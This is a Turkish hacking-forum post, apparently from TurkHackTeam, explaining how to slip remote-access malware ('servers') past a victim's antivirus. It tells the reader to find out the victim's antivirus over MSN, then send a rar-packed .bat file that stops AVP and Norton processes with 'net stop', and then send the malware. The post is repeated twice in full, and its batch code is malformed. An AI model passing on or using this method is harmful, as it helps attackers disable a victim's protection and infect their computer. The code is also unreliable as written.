Merhaba değerli TurkHackTeam daki herkese , arkadaşlar oluşturduğumuz serverlar varya bunları çoğu zamam Crypter türevli programlar ile Crypt ediyoruz ancak yinede yakalanabiliyor Antivürüslere
Değişik bir yol paylaşmak istedim
Klasik bir .bat dosyası oluşturacağız ancak ilk önce yollayacağımız kişinin hangi antivir kullandığını msn den vs öğrenmek gerekiyor örneğin norton kullanıyor diyelim
(AVP.EXE AVP 32 Avp32.exe-- Bunlar değişmez her anti kapatmak için lazım)
Nortonun doyaları ccapp.exe ile nprotect.exe
kod dosyamız şu
@echo off
SET SRV_LST=AVP.EXE
AVP32
Avp32.exe
ccapp.exe nprotect.exe
FOR /F "skip=1 eol=> tokens=1 delims=" %%a IN (%SRV_LST%) DO (@net stop %%a /y)
Bunu bat olarak kaydedip bilinen şekilde rar ile sıkıştırıp göndermek kalıyor geriye(Bu bat yakalanmıyor) ardından Serverımızı yolluyoruz Vürüs olarak algılanmıyor deneyenlerin söylediği temiz bir yol
Her antivürüsün dosya isimlerini buldukmu olay tamam gibi
Antivir kapattırma üzerine yoğunlaşacağım
Değişik bir yol paylaşmak istedim
Klasik bir .bat dosyası oluşturacağız ancak ilk önce yollayacağımız kişinin hangi antivir kullandığını msn den vs öğrenmek gerekiyor örneğin norton kullanıyor diyelim
(AVP.EXE AVP 32 Avp32.exe-- Bunlar değişmez her anti kapatmak için lazım)
Nortonun doyaları ccapp.exe ile nprotect.exe
kod dosyamız şu
@echo off
SET SRV_LST=AVP.EXE
AVP32
Avp32.exe
ccapp.exe nprotect.exe
FOR /F "skip=1 eol=> tokens=1 delims=" %%a IN (%SRV_LST%) DO (@net stop %%a /y)
Bunu bat olarak kaydedip bilinen şekilde rar ile sıkıştırıp göndermek kalıyor geriye(Bu bat yakalanmıyor) ardından Serverımızı yolluyoruz Vürüs olarak algılanmıyor deneyenlerin söylediği temiz bir yol
Her antivürüsün dosya isimlerini buldukmu olay tamam gibi
Antivir kapattırma üzerine yoğunlaşacağım